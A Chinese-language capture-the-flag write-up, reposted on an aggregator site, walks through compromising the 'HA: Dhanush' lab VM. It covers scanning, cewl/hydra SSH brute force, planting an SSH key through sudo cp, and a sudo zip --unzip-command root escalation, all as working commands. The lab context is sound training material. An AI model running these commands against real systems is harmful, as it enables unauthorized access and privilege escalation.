欢迎访问 生活随笔!

生活随笔

当前位置: 首页 > 人文社科 > 生活经验 >内容正文

生活经验

HA: Dhanush靶机渗透测试

发布时间:2023/11/28 生活经验 51 豆豆
生活随笔 收集整理的这篇文章主要介绍了 HA: Dhanush靶机渗透测试 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

文章目录

      • 一、信息收集
        • 1.主机发现
        • 2.端口扫描
        • 3.查看 web 服务
      • 二、漏洞挖掘
        • 1.使用 cewl 生成字典
        • 2.使用 hydra 进行爆破
        • 3.ssh 连接
        • 4.尝试 sudo 提权

靶机介绍:

一、信息收集

1.主机发现

arp-scan -l


发现靶机 ip:192.168.1.119

2.端口扫描

nmap -A -p- 192.168.1.119


发现开放了 80 端口,Apache 服务,ubuntu系统;
65345 端口,ssh 服务

3.查看 web 服务

访问 192.168.1.119:

发现介绍 dhanush,没有什么特别的

二、漏洞挖掘

1.使用 cewl 生成字典

没有什么信息,根据提示:枚举,我们尝试从靶机的 web 服务生成 ssh 登陆的账号密码进行遍历爆破


cewl http://192.168.1.119/ -w dict.txt    #生成密码
john --wordlist=dict.txt --stdout --rules > ./users.txt    #生成用户名列表

2.使用 hydra 进行爆破

hydra -L ./users.txt -P ./dict.txt 192.168.1.119 ssh -s 65345 -e nsr -t 30

爆破时间较长,大概需要 10 分钟左右

3.ssh 连接

ssh pinak@192.168.1.119 -p 65345
yes
Gandiv

4.尝试 sudo 提权


发现可以以 sarang 用户权限使用 cp,查看该用户信息


发现 sarang 路径下有 .ssh 目录,尝试进入但是没有权限,结合 sudo -l 得到的可以 sarang 权限执行 cp ,尝试在当前用户创建 ssh,将公钥复制到 sarang 路径去然后使用 ssh 连接

cd ~
ssh-keygen    #生成ssh密钥(我这里是一直回车无密码)
chmod 777 ./.ssh/id_rsa.pub 
cp .ssh/id_rsa.pub /home/pinak
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345



经过一番操作可以看到我们进入了 sarang 用户
再次尝试 sudo 提权

发现可以以 root 权限执行 zip 命令,进行利用获得 root 权限

touch dhanush
sudo zip /tmp/dhanush.zip /home/sarang/dhanush -T --unzip-command="sh -c /bin/bash"
cd /root

总结

以上是生活随笔为你收集整理的HA: Dhanush靶机渗透测试的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。